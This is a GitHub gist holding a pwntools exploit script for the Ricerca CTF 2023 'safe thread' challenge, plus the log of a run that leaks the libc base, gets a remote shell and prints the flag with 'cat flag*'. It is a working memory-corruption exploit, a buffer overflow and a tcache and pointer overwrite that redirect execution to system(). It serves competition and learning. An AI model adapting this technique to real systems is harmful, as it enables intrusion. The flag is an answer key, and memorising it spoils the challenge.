Created
April 22, 2023 13:45
-
-
Save hama7230/2e1ce535366301e57aa9be7b9ec54afc to your computer and use it in GitHub Desktop.
Ricerca CTF 2023 - safe thread
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pwn import * | |
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
# context(terminal=['tmux', 'new-window']) # open new window | |
# libc = ELF('') | |
elf = ELF('./chall') | |
context(os='linux', arch=elf.arch) | |
# context(log_level='debug') # output verbose log | |
RHOST = "safe-thread.2023.ricercactf.com" | |
RPORT = 9004 | |
LHOST = "127.0.0.1" | |
LPORT = 21700 | |
def section_addr(name, elf=elf): | |
return elf.get_section_by_name(name).header['sh_addr'] | |
def dbg(ss): | |
log.info("%s: 0x%x" % (ss, eval(ss))) | |
conn = None | |
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option | |
if opt in 'rl': | |
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt]) | |
elif opt == 'd': | |
gdbscript = """ | |
continue | |
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint)) | |
conn = gdb.debug(['./chall'], gdbscript=gdbscript) | |
else: | |
conn = process(['./chall']) | |
# conn = process(['./lazyhouse'], env={'LD_PRELOAD': ''}) | |
if opt == 'a': gdb.attach(conn) | |
# exploit | |
log.info('Pwning') | |
payload = str(0x2000 + 1) + '\n' | |
conn.sendafter("size:", payload) | |
payload = b'x'*0x7d8 | |
payload += p64(0x403f82) | |
payload += p64(0) * 10 | |
payload += p64(0xdeadbeef) * 2 + p64(0x404100) + p64(0xdeadbee) + p64(0) + p64(0xbadbeef) | |
payload += p64(0x4012c3) | |
conn.sendafter("data", payload + b'\n') | |
conn.recvuntil(b'\x00') | |
libc_base = u64(b'\x00'+conn.recv(7)) - 0x21af00 | |
print("libc_base : " + hex(libc_base)) | |
tcache_key = 0x4012c3 | |
do_system = libc_base + 0x508f0 + 2 | |
addr = ((do_system ^ tcache_key)<<0x11)&0xffffffffffff8000 | |
addr += ((do_system ^ tcache_key)>>0x2f)&0x7fff | |
payload = p64(addr) + p64(libc_base + 0x1d8698) + p64(0) + p64(0) | |
payload = payload.ljust(0x870, b'z') | |
payload += p64(libc_base-0x4288) | |
conn.send(payload) | |
conn.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@u22:~/safe-thread# python3 exp.py r | |
[*] '/root/safe-thread/chall' | |
Arch: amd64-64-little | |
RELRO: Full RELRO | |
Stack: No canary found | |
NX: NX enabled | |
PIE: No PIE (0x400000) | |
[+] Opening connection to safe-thread.2023.ricercactf.com on port 9004: Done | |
[*] Pwning | |
/root/safe-thread/exp.py:41: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes | |
conn.sendafter("size:", payload) | |
/usr/local/lib/python3.10/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes | |
res = self.recvuntil(delim, timeout=timeout) | |
libc_base : 0x7f54198ac000 | |
[*] Switching to interactive mode | |
s\xac\x19\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xac\x19\x7f\x00\x04\xac\x19\x7f\x00\x04\xac\x19\x7f\x00$ | |
$ ls | |
bin | |
boot | |
dev | |
etc | |
flag-b620074ecec0a4693a967174b8d8d4af.txt | |
home | |
lib | |
lib32 | |
lib64 | |
libx32 | |
media | |
mnt | |
opt | |
proc | |
root | |
run | |
sbin | |
srv | |
sys | |
tmp | |
usr | |
var | |
$ cat flag* | |
RicSec{pthread_1s_w34k_t0_BOF_by_d3s1gn} | |
$ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment